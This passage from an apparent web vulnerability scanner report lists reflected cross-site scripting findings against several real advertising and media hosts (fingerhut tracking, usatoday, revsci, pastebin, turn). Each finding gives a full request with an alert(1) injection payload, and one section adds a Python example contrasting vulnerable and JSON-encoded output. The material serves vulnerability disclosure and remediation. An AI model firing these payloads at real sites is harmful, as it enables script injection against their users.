Issue detail

The value of the na_title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f09c"><script>alert(1)</script>b81aaeddec was submitted in the na_title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=4f09c"><script>alert(1)</script>b81aaeddec&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:25 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:25 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:25 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:25 GMT
Server: lighttpd/1.4.18
Content-Length: 395


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3d4f09c"><script>alert(1)</script>b81aaeddec&phint=__bk_k%3d&limit=4" height="0" width="0" frameborder="0">
...[SNIP]...

5.51. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fingerhut.tt.omtrdc.net
Path:   /m2/fingerhut/mbox/standard

Issue detail

The value of the mbox request parameter is copied into a single-quoted JavaScript string literal in a response served as text/javascript. The payload bc9c9<script>alert(1)</script>41364d59e04 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

Because the reflection sits inside a string literal, the script tags in this payload are inert, and a browser loading the URL directly will not render the body as HTML. What would matter is a single quotation mark or backslash in the value, which this request does not test. The response does show that <, > and / pass through unencoded, so checking how ' is handled is the next step before treating this as exploitable; the High/Certain rating is the scanner's.

Request

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-478846&mboxPage=1305509219944-478846&mboxCount=1&mbox=FHTOCP_welcomebc9c9<script>alert(1)</script>41364d59e04&mboxId=0&mboxTime=1305491220005&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 210
Date: Mon, 16 May 2011 01:36:07 GMT
Server: Test & Target

mboxFactories.get('default').get('FHTOCP_welcomebc9c9<script>alert(1)</script>41364d59e04',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305509219944-478846.17");

5.52. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /asp/usatly/handler.ashx

Issue detail

The value of the longUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5858'%3balert(1)//02d6293dc was submitted in the longUrl parameter. This input was echoed as c5858';alert(1)//02d6293dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the single quotation mark is not escaped, so the payload closes the string literal, adds a statement, and comments out the rest of the line. Because the response is served as application/x-javascript, the injected statement runs in the origin of whichever page includes this handler as a script. The request's Referer and Accept: */* are consistent with a script include from a travel.usatoday.com page, so exploitability against that site depends on whether an attacker can influence the longUrl value the page passes.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /asp/usatly/handler.ashx?longUrl=c5858'%3balert(1)//02d6293dc HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 138
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: private, max-age=86400
Date: Mon, 16 May 2011 01:19:47 GMT
Connection: close
Vary: Accept-Encoding

var usatlyshorturl = 'c5858';alert(1)//02d6293dc'; // Currently only the following domains are supported: usatoday.com,usatodayeducate.com
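
The single-quote break-out above, and the remediation paragraph's advice, as an added Python example that is not usatoday's code: render_vulnerable reproduces the response line from this report by interpolating longUrl into a single-quoted literal, render_hardened emits the value as a JSON string literal with < and > additionally escaped, and a small string-literal scanner shows which of the two lets the payload land outside the literal as live code. The variable name and the trailing comment are taken from the response above; the function names and the hardened rendering are assumptions made for illustration.

```python
import json

# Text taken from the 5.52 response; the rendering functions around it are
# illustrative and are not the handler's real code.
TRAILER = ("; // Currently only the following domains are supported: "
           "usatoday.com,usatodayeducate.com")
PAYLOAD = "c5858';alert(1)//02d6293dc"
REPORT_LINE = ("var usatlyshorturl = 'c5858';alert(1)//02d6293dc'; // Currently only "
               "the following domains are supported: usatoday.com,usatodayeducate.com")


def render_vulnerable(long_url):
    """Raw interpolation into a single-quoted JS literal: what the response shows."""
    return "var usatlyshorturl = '" + long_url + "'" + TRAILER


def render_hardened(long_url):
    """JSON-encode the value so quotes, backslashes, newlines and non-ASCII are
    escaped, then also escape < and > so the literal stays inert if the same
    output is ever inlined inside an HTML <script> block."""
    literal = json.dumps(long_url)          # ensure_ascii=True also covers U+2028/2029
    literal = literal.replace("<", "\\u003c").replace(">", "\\u003e")
    return "var usatlyshorturl = " + literal + TRAILER


def end_of_string_literal(js, start):
    """js[start] is the opening quote; return the index just past the closing
    quote, honouring backslash escapes (a one-statement JS literal scanner)."""
    quote = js[start]
    i = start + 1
    while i < len(js):
        if js[i] == "\\":
            i += 2                           # skip the escaped character
            continue
        if js[i] == quote:
            return i + 1
        i += 1
    raise ValueError("unterminated string literal")


def code_after_literal(rendered):
    """Return the JavaScript that follows the first string literal of the
    assignment. With correct encoding this is just the trailer."""
    start = rendered.index("= ") + 2
    return rendered[end_of_string_literal(rendered, start):]


def payload_escapes_string(render, payload):
    """True if alert(1) ends up as live code for the given renderer: outside
    the literal and not behind the // comment the payload itself opens."""
    tail = code_after_literal(render(payload))
    return "alert(1)" in tail.split("//")[0]


if __name__ == "__main__":
    assert render_vulnerable(PAYLOAD) == REPORT_LINE
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(name, "->", render(PAYLOAD))
        print("   payload escapes the literal:", payload_escapes_string(render, PAYLOAD))
```

The scanner only checks one statement, which is all this handler emits; the point it makes is that the fix is encoding for the script context (a JSON literal, with < escaped), not stripping the characters the scanner happened to send.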

5.53. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the body of the response. The payload 72b1b<script>alert(1)</script>01f0fef14a3 was submitted in the csid parameter. It was echoed converted to upper case, inside a JavaScript block comment, in a response served with Content-Type application/javascript.

That reflection does not by itself give script execution: a browser that loads this URL treats the body as a script, where the comment is inert, and even if the body were rendered as HTML the upper-cased ALERT(1) would not call alert. Treat this as an unencoded reflection to verify manually (for instance in a browser that sniffs content types, or at a call site that writes the response into a document) rather than as a confirmed cross-site scripting issue; the High/Certain rating is the scanner's.

Request

GET /gateway/gw.js?csid=E0656072b1b<script>alert(1)</script>01f0fef14a3 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_IH_7="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRcudMd6UdHTVGVIPJjz/yF34dHT25tVh790Up6NBJPV43sAoYRKLv7Za4Rwx2/OuBlUO+TFiqzoc98k+cpjMMg5USvXrBeFN3oCTNygkzLwCEpbHvTO1DFmYTno4bvhgTyCVUCll7KXXgfUAI0Py2fGh6MPSOt7ObjB3woINiVApH0A=="; rsi_us_1000000="...[SNIP]..."; rtc_d1yn=MLuB648HgV9DFVRAcMKRV8BItq+wLgaJCK6wgl48oj9LoBSPJndTC+3SWz6oSpsoBhz2GNjcf7S7fSphFBYcKsIf2/9slCRRHs5A9NFuqZhZbQLdIFwm9RF6U8URf2N/KH0qGR1QY3DxZLycbLU=; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtlR8qmZ5EYm2QQMyGpObby6k11tNu345vUZaCKjYPpg7DctEzT/YmvwSV+h+zyWJPM6bhzBtArAADE6trLuK01RUTHtoDIZGMfgWkONiixNKs3XuqReSNH/gBjg==; udm_0=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 16 May 2011 01:19:40 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 17 May 2011 01:19:40 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:39 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "E0656072B1B<SCRIPT>ALERT(1)</SCRIPT>01F0FEF14A3" was not recognized.
*/

5.54. http://pastebin.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the content attribute of the page's og:url meta element, which is encapsulated in double quotation marks. The payload 50732"><script>alert(1)</script>d0c46a64a0 was submitted in the REST URL parameter 1. This input was echoed as 50732\"><script>alert(1)</script>d0c46a64a0 in the application's response.

The backslash inserted before the quotation mark is string-literal escaping of the kind PHP's addslashes() or magic quotes produce (the response advertises X-Powered-By: PHP). It has no meaning inside an HTML attribute: the quotation mark still terminates the attribute value, the > closes the meta element, and the script element that follows is parsed as markup. This proof-of-concept attack therefore demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The correct encoding for this context is HTML entity encoding of the value (&quot;, &lt;, &gt;), not backslash escaping.

Request

GET /favicon.ico50732"><script>alert(1)</script>d0c46a64a0 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:57 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:57 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/favicon.ico50732\"><script>alert(1)</script>d0c46a64a0"/>
...[SNIP]...

5.55. http://pastebin.com/i/fixed.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6806"><script>alert(1)</script>a1c2cdd2d5 was submitted in the REST URL parameter 1. This input was echoed as e6806\"><script>alert(1)</script>a1c2cdd2d5 in the application's response. As in 5.54, the backslash added before the quotation mark is string-literal escaping and does not stop the quotation mark from terminating the attribute.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ie6806"><script>alert(1)</script>a1c2cdd2d5/fixed.css?1 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/ie6806\"><script>alert(1)</script>a1c2cdd2d5/fixed.css?1"/>
...[SNIP]...

5.56. http://pastebin.com/i/fixed.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ab5"><script>alert(1)</script>a013d73a3b1 was submitted in the REST URL parameter 2. This input was echoed as a9ab5\"><script>alert(1)</script>a013d73a3b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/fixed.cssa9ab5"><script>alert(1)</script>a013d73a3b1?1 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/fixed.cssa9ab5\"><script>alert(1)</script>a013d73a3b1?1"/>
...[SNIP]...

5.57. http://pastebin.com/i/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f371c"><script>alert(1)</script>d78be778a57 was submitted in the REST URL parameter 1. This input was echoed as f371c\"><script>alert(1)</script>d78be778a57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /if371c"><script>alert(1)</script>d78be778a57/style.css?9 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/if371c\"><script>alert(1)</script>d78be778a57/style.css?9"/>
...[SNIP]...

5.58. http://pastebin.com/i/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0eb9"><script>alert(1)</script>38e6086d1db was submitted in the REST URL parameter 2. This input was echoed as c0eb9\"><script>alert(1)</script>38e6086d1db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/style.cssc0eb9"><script>alert(1)</script>38e6086d1db?9 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:48 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:48 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/style.cssc0eb9\"><script>alert(1)</script>38e6086d1db?9"/>
...[SNIP]...

5.59. http://pastebin.com/trends [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /trends

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddfb"><script>alert(1)</script>54be6eeb293 was submitted in the REST URL parameter 1. This input was echoed as 5ddfb\"><script>alert(1)</script>54be6eeb293 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trends5ddfb"><script>alert(1)</script>54be6eeb293 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 12233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/trends5ddfb\"><script>alert(1)</script>54be6eeb293"/>
...[SNIP]...

5.60. http://pastebin.com/trends [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /trends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a94d7"><script>alert(1)</script>ffd01446e74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a94d7\"><script>alert(1)</script>ffd01446e74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trends?a94d7"><script>alert(1)</script>ffd01446e74=1 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 12237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/trends?a94d7\"><script>alert(1)</script>ffd01446e74=1"/>
...[SNIP]...

5.61. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad70c"><script>alert(1)</script>dc12055dabf was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ad70c"><script>alert(1)</script>dc12055dabf&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; uid=4325897289836481830; rrs=1; rds=15110; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:36 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:22:36 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2757321833532286343&fpid=ad70c"><script>alert(1)</script>dc12055dabf&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.62. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

